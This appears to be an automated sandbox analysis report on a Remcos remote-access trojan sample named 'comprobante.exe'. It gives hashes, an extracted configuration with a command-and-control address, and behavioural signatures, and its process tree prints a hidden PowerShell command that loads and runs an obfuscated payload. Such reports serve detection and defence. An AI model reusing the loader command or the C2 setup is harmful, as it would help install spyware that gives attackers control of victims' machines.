Analysis
-
max time kernel
149s -
max time network
148s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
25-11-2024 12:26
Static task
static1
Behavioral task
behavioral1
Sample
comprobante.exe
Resource
win7-20240729-en
Behavioral task
behavioral2
Sample
comprobante.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
Fraiche.ps1
Resource
win7-20240903-en
Behavioral task
behavioral4
Sample
Fraiche.ps1
Resource
win10v2004-20241007-en
General
-
Target
comprobante.exe
-
Size
1.1MB
-
MD5
6d3f0aac19f5bae4c91bb3371b867852
-
SHA1
d63b777dd2fd2a1663bafb85948fa56477935796
-
SHA256
5d03acf2ac90c88be47bd3ae811fcc7ebfb7e8cc0018c3eda2c205b0bb4ba90c
-
SHA512
46f717d0a28a490e2631620f8be91d8b603d872c5db6fe59e062d3dd10fb7c4e5351f73ff65dd451acb790fe3a49a4494c7bd49e5e2ba1b87cb4ba71df7fa530
-
SSDEEP
24576:QS8Rx57ZVv0of1RkVZzoOQxdVo18vBtpPibYy:uzZnv0of1RkgOQxdGctwr
Malware Config
Extracted
remcos
RemoteHost
176.10.80.43:3050
-
audio_folder
MicRecords
-
audio_path
ApplicationPath
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-L6TTXL
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Remcos family
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Loads dropped DLL 1 IoCs
Processes:
luskendes.exepid Process 3260 luskendes.exe -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
Processes:
luskendes.exepid Process 3260 luskendes.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
powershell.exeluskendes.exepid Process 4404 powershell.exe 3260 luskendes.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
comprobante.exepowershell.exeluskendes.exedescription ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language comprobante.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language luskendes.exe -
NSIS installer 2 IoCs
Processes:
resource yara_rule behavioral2/files/0x000c000000023b78-72.dat nsis_installer_1 behavioral2/files/0x000c000000023b78-72.dat nsis_installer_2 -
Suspicious behavior: EnumeratesProcesses 9 IoCs
Processes:
powershell.exepid Process 4404 powershell.exe 4404 powershell.exe 4404 powershell.exe 4404 powershell.exe 4404 powershell.exe 4404 powershell.exe 4404 powershell.exe 4404 powershell.exe 4404 powershell.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
powershell.exepid Process 4404 powershell.exe -
Suspicious use of AdjustPrivilegeToken 22 IoCs
Processes:
powershell.exedescription pid Process Token: SeDebugPrivilege 4404 powershell.exe Token: SeIncreaseQuotaPrivilege 4404 powershell.exe Token: SeSecurityPrivilege 4404 powershell.exe Token: SeTakeOwnershipPrivilege 4404 powershell.exe Token: SeLoadDriverPrivilege 4404 powershell.exe Token: SeSystemProfilePrivilege 4404 powershell.exe Token: SeSystemtimePrivilege 4404 powershell.exe Token: SeProfSingleProcessPrivilege 4404 powershell.exe Token: SeIncBasePriorityPrivilege 4404 powershell.exe Token: SeCreatePagefilePrivilege 4404 powershell.exe Token: SeBackupPrivilege 4404 powershell.exe Token: SeRestorePrivilege 4404 powershell.exe Token: SeShutdownPrivilege 4404 powershell.exe Token: SeDebugPrivilege 4404 powershell.exe Token: SeSystemEnvironmentPrivilege 4404 powershell.exe Token: SeRemoteShutdownPrivilege 4404 powershell.exe Token: SeUndockPrivilege 4404 powershell.exe Token: SeManageVolumePrivilege 4404 powershell.exe Token: 33 4404 powershell.exe Token: 34 4404 powershell.exe Token: 35 4404 powershell.exe Token: 36 4404 powershell.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
luskendes.exepid Process 3260 luskendes.exe -
Suspicious use of SendNotifyMessage 1 IoCs
Processes:
luskendes.exepid Process 3260 luskendes.exe -
Suspicious use of WriteProcessMemory 7 IoCs
Processes:
comprobante.exepowershell.exedescription pid Process procid_target PID 2396 wrote to memory of 4404 2396 comprobante.exe 82 PID 2396 wrote to memory of 4404 2396 comprobante.exe 82 PID 2396 wrote to memory of 4404 2396 comprobante.exe 82 PID 4404 wrote to memory of 3260 4404 powershell.exe 91 PID 4404 wrote to memory of 3260 4404 powershell.exe 91 PID 4404 wrote to memory of 3260 4404 powershell.exe 91 PID 4404 wrote to memory of 3260 4404 powershell.exe 91
Processes
-
C:\Users\Admin\AppData\Local\Temp\comprobante.exe"C:\Users\Admin\AppData\Local\Temp\comprobante.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2396 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -windowstyle hidden "$Haokah=Get-Content -raw 'C:\Users\Admin\AppData\Local\Temp\groupies\Fraiche.Cui';$Ssterskibets=$Haokah.SubString(53203,3);.$Ssterskibets($Haokah)"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4404 -
C:\Users\Admin\AppData\Local\Temp\luskendes.exe"C:\Users\Admin\AppData\Local\Temp\luskendes.exe"3⤵
- Loads dropped DLL
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3260
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
304KB
MD5b1faa03637fbe657b0d70562afa791f4
SHA1307c1d804b5818b4cd2ddd4d7bc837747beb3dd1
SHA256fffafad8bf991904296baa85ed0971904dc6fa26b98a3197c276fd277c850fb5
SHA512b538b8fe48d224f4642345dc949aa42a5d3b3aa06f0253cca9352656e760fb9f8d4947ebce6f6975886c1d8d02953d0cece0e5af3e016bec6d494a2eb23f5231
-
Filesize
52KB
MD563d5ccbfe881421a78f178a4a02f769a
SHA1c700b0183dba755052657d22746069364218f98e
SHA256ceeef787fe9f17c084c9450e398b9d23efe036931fcbbedd1eabd9745f5662b5
SHA512d551d7b4d7309a5d0660a53ccad672f442bc4b3de88ebff9a5ff269c56f50cd9000bb96f2479e480bba8b1f312277aa12ddefc5156dfe81c65b43f42ffa2a9a6
-
Filesize
1.1MB
MD56d3f0aac19f5bae4c91bb3371b867852
SHA1d63b777dd2fd2a1663bafb85948fa56477935796
SHA2565d03acf2ac90c88be47bd3ae811fcc7ebfb7e8cc0018c3eda2c205b0bb4ba90c
SHA51246f717d0a28a490e2631620f8be91d8b603d872c5db6fe59e062d3dd10fb7c4e5351f73ff65dd451acb790fe3a49a4494c7bd49e5e2ba1b87cb4ba71df7fa530